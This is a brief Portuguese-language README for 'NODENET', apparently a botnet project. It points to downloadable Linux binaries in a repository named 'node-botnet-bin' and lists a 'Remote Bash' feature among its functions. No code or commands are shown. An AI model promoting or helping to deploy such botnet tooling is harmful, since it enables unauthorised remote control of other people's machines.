# NODENET
Binarios do nodenet compilados para linux via pipeline
Todos os binarios estão disponiveis em [download](https://bitbucket.org/Bustersky13/node-botnet-bin/downloads/)

## Funcionalidades
- Remote Bash (precisa do **nodenet-bash**)
- Hello World response
- Exit from request